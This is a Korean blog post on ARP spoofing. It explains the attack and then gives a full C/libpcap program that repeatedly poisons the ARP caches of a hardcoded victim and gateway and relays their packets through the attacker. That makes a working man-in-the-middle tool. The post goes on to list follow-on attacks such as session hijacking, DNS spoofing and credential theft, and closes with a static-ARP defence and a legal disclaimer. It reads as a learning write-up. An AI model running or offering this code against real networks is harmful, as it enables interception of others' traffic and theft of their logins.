[C / lpcap] ARP Spoofing

안녕하세요. 오랜만에 글을 씁니다.

처음에 윈도우환경에서 ARP Spoofing툴을 만들다가 라이브러리 지원한계 때문에 Ubuntu로 넘어갔습니다.

다른 공부하는 분들도 ARP Spoofing처럼 Pcap을 이용해서 개발하실 때는 Ubuntu에서 하시는걸 추천드립니다!

우선 ARP Spoofing에 대해서 간단히 설명하자면

*정상적인 패킷흐름*                                 ARP SPOOFING                                    *비정상적인 패킷흐름*

VICTIM <-> GATEWAY                             ----------------->                        VICTIM <-> ATTACKER <-> GATEWAY

위 처럼 중간에 ATTACKER를 지나서 패킷이 흐르게 됩니다.

이렇게 되면 공격자 입장에서는 VICTIM의 패킷을 전부 훔쳐볼 수 있게되는거죠.

어떻게 이런 공격이 가능할까요?

ARP Protocol이 동적인 부분을 이용해서 VICTIM에게 '내가 GATEWAY야!' 라고 보내면

ARP는 진짜인지 아닌지 확인할 방법이 없기 때문에 바로 ARP테이블에 반영하게 됩니다.

이렇게 VICTIM에게는 '내가 GATEWAY야!' / GATEWAY에게는 '내가 VICTIM이야!' 라고 계속 보내주면

그게 진짜라고 생각하고 모든패킷을 ATTACKER에게 보내주게 되는겁니다.

*ARP Spoofing 공격 과정*

1. ARP패킷을 VICTIM / GATEWAY에게 보내서 Cache Poisoning을 1차적으로 합니다.

-> 이 단계에서는 VICTIM / GATEWAY의 ARP테이블은 바뀌겠지만, 인터넷 통신이 안되서 감염사실을 알아차리게 됩니다.

2. VICTIM에게 오는 패킷은 GATEWAY로 / GATEWAY에서 오는 패킷은 VICTIM으로 보냅니다.

-> 이렇게 패킷 릴레이를 해줘야 VICTIM이 정상적으로 인터넷통신이 가능해집니다.

이론적으로는 굉장히 쉬운 공격이지만, 코드로 직접 툴을 짜려니까 꽤 오래 걸렸습니다...

#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <netinet/ether.h>
#include <netinet/if_ether.h>
#include <arpa/inet.h>
 
#define BUF_SIZE 100
#define SNAPLEN 1024
 
//전역변수로 생성
pcap_t *use_dev;
 
// 첫번째 Thread VICTIM 담당
void *Arp_send_VICTIM(void *arg)
{
 
    unsigned char packet[100]={0,};
        packet[0] = 0x40;
        packet[1] = 0x8d;
        packet[2] = 0x5c;
        packet[3] = 0x69;
        packet[4] = 0x2e;
        packet[5] = 0x7a;
 
 
        packet[6] = 0x00;
        packet[7] = 0x0c;
        packet[8] = 0x29;
        packet[9] = 0x05;
        packet[10] = 0x6d;
        packet[11] = 0xa8;
 
        //ether_type (ARP로 설정)
        packet[12] = 0x08;
        packet[13] = 0x06;
 
        //hrd_type (Ethernet로 설정)
        packet[14] = 0x00;
        packet[15] = 0x01;
 
        //proto_type (IPv4 로 설정)
        packet[16] = 0x08;
        packet[17] = 0x00;
 
        //hrd_size (6)
        packet[18] = 0x06;
        //proto_size (4)
        packet[19] = 0x04;
 
        //Opcode (request)
        packet[20] = 0x00;
        packet[21] = 0x01;
 
        // Sender MAC (My mac)
        packet[22] = 0x00;
        packet[23] = 0x0c;
        packet[24] = 0x29;
        packet[25] = 0x05;
        packet[26] = 0x6d;
        packet[27] = 0xa8;
        //Sender IP (MY ip)
        packet[28] = 10;
        packet[29] = 100;
        packet[30] = 114;
        packet[31] = 1;
 
        //Target MAC
        packet[32] = 0x40;
        packet[33] = 0x8d;
        packet[34] = 0x5c;
        packet[35] = 0x69;
        packet[36] = 0x2e;
        packet[37] = 0x7a;
        //Target IP
        packet[38] = 10;
        packet[39] = 100;
        packet[40] = 114;
        packet[41] = 253;
 
        while(1)
        {
            if(pcap_sendpacket(use_dev,packet,42)!=0)
            {
                printf("SEND PACKET ERROR!\n");
                pthread_exit(NULL);
            }
            printf("VICTIM_ARP\n");
            sleep(1);
        }
    pthread_exit(NULL);
 
}
 
//두번째 Thread GATEWAY 담당
void *Arp_send_GATEWAY(void *arg)
{
    unsigned char packet[100]={0,};
        packet[0] = 0x10;
        packet[1] = 0x0e;
        packet[2] = 0x7e;
        packet[3] = 0x2a;
        packet[4] = 0x48;
        packet[5] = 0x01;
 
 
        packet[6] = 0x00;
        packet[7] = 0x0c;
        packet[8] = 0x29;
        packet[9] = 0x05;
        packet[10] = 0x6d;
        packet[11] = 0xa8;
 
        //ether_type (ARP로 설정)
        packet[12] = 0x08;
        packet[13] = 0x06;
 
        //hrd_type (Ethernet로 설정)
        packet[14] = 0x00;
        packet[15] = 0x01;
 
        //proto_type (IPv4 로 설정)
        packet[16] = 0x08;
        packet[17] = 0x00;
 
        //hrd_size (6)
        packet[18] = 0x06;
        //proto_size (4)
        packet[19] = 0x04;
 
        //Opcode (request)
        packet[20] = 0x00;
        packet[21] = 0x01;
 
        // Sender MAC (My mac)
        packet[22] = 0x00;
        packet[23] = 0x0c;
        packet[24] = 0x29;
        packet[25] = 0x05;
        packet[26] = 0x6d;
        packet[27] = 0xa8;
        //Sender IP (MY ip)
        packet[28] = 10;
        packet[29] = 100;
        packet[30] = 114;
        packet[31] = 253;
 
        //Target MAC
        packet[32] = 0x10;
        packet[33] = 0x0e;
        packet[34] = 0x7e;
        packet[35] = 0x2a;
        packet[36] = 0x48;
        packet[37] = 0x01;
        //Target IP
        packet[38] = 10;
        packet[39] = 100;
        packet[40] = 114;
        packet[41] = 1;
 
        while(1)
        {
            if(pcap_sendpacket(use_dev,packet,42)!=0)
            {
                printf("SEND PACKET ERROR!\n");
                pthread_exit(NULL);
            }
            printf("GATEWAY_ARP\n");
            sleep(1);
        }
    pthread_exit(NULL);
}
 
//Thread 생성하는 함수
void Thread_up()
{
    pthread_t threads[2];
    if((pthread_create(&threads[0],NULL,&Arp_send_VICTIM,NULL))!=0)
    {
        printf("ERROR\n");
    }
    if((pthread_create(&threads[1],NULL,&Arp_send_GATEWAY,NULL))!=0)
    {
        printf("ERROR\n");
    }
}
 
//장치 설정하는 함수
void init_dev(char **dev)
{
    char errbuf[PCAP_ERRBUF_SIZE];
 
    *dev = pcap_lookupdev(errbuf);
 
    if(dev == NULL)
    {
        printf("%s\n",errbuf);
        exit(1);
    }
    use_dev = pcap_open_live(*dev, BUFSIZ, 1, 1,errbuf);
 
    if(use_dev == NULL)
    {
        printf("%s\n",errbuf);
        exit(1);
    }
 
    return;
}
 
//필터룰 설정하는 함수
void set_filter(char *filter, char *victim_ip)
{
    struct bpf_program fp;
 
    printf("SET FILTERING...\n");
    strcat(filter,"host ");
    strcat(filter,victim_ip);
    printf("SET FILTER :: %s\n",filter);
 
    if(pcap_compile(use_dev,&fp,filter,SNAPLEN,1)<0)
    {
        printf("COMPILE ERROR!\n");
        exit(1);
    }
    if(pcap_setfilter(use_dev,&fp)<0)
    {
        printf("SETFILET ERROR!\n");
        exit(1);
    }
    return;
}
//loop함수-callback함수(패킷 릴레이처리해주는 부분)
void callback(unsigned char *param,const struct pcap_pkthdr *header,const unsigned char *pkt_data)
{
    struct ether_header *eh = (struct ether_header *)pkt_data;
    printf("Callbakc :: In\n");
 
    unsigned char VICTIM_MAC[6] = {0x40,0x8d,0x5c,0x69,0x2e,0x7a};
    unsigned char ATTACK_MAC[6] = {0x00,0x0c,0x29,0x05,0x6d,0xa8};
    unsigned char GATEWAY_MAC[6] = {0x10,0x0e,0x7e,0x2a,0x48,0x01};
    if((memcmp(VICTIM_MAC,eh->ether_shost,sizeof(eh->ether_shost)))==0)
    {
        printf("VICTIM -> GATEWAY\n");
        memcpy(eh->ether_shost,ATTACK_MAC,sizeof(eh->ether_shost));
        memcpy(eh->ether_dhost,GATEWAY_MAC,sizeof(eh->ether_dhost));
    }
    if((memcmp(GATEWAY_MAC,eh->ether_shost,sizeof(eh->ether_shost)))==0)
    {
        printf("GATEWAY -> VICTIM\n");
        memcpy(eh->ether_shost,ATTACK_MAC,sizeof(eh->ether_shost));
        memcpy(eh->ether_dhost,VICTIM_MAC,sizeof(eh->ether_dhost));
    }
 
    pcap_sendpacket(use_dev,pkt_data,header->caplen);
}
 
int main(int argc, char **argv)
{
    char *dev;
    char filter[BUF_SIZE]={0,};
    char victim_ip[BUF_SIZE]={0,};
 
    //인자값으로 VICTIM_IP 받음
    if(argv[1])
    {
        strcpy(victim_ip,argv[1]);
    }
    else
    {
        printf("Please enter the Victim_IP\n");
        return 1;
    }
    //디바이스 설정
    init_dev(&dev);
    //필터 설정
    set_filter(filter,victim_ip);
    //Thread 생성
    Thread_up();
    // Packet Start
    pcap_loop(use_dev,0,callback,NULL);
    pcap_close(use_dev);
 
    return 0;
 
}

쓰레드를 이용해서 첫번째 쓰레드는 VICTIM Poisoning / 두번째 쓰레드는 GATEWAY Poisoning을 진행하고

들어오는 패킷은 callback함수가 릴레이해주는 식으로 코딩하였습니다.

ARP Spoofing 공격을 1차적으로 한뒤에는 패킷을 Attacker 마음대로 변조가 가능하니 2차적인 공격이 가능하겠죠.

예를들면

• 악성코드 유포
• 세션 하이재킹
• DNS Spoofing
• VoIP 도청
• 로그인 정보(아이디/패스워드) 수집

등이 가능하겠습니다. 

ARP공격 예방법

cmd창을 관리자모드로 연 후, arp -s [Gateway_IP] [Gateway_MAC] 명령어로 정적설정해주시면

Gateway가 고정되기 때문에 아무리 ARP패킷이 와도 바뀌지 않습니다. 

인터넷 환경이 자주 바뀌지 않는다면, ARP테이블을 정적으로 설정하시는게 보안에 도움이 되겠습니다.

다음 글은 아마 프록시툴 개발이 되겠네요. 그럼 다음 글에서 봽겠습니다.

* 해당 글에서 습득한 정보로 위법적인 행동을 금합니다.

  위법 행위를 할 시, 글 작성자와는 무관함을 알립니다.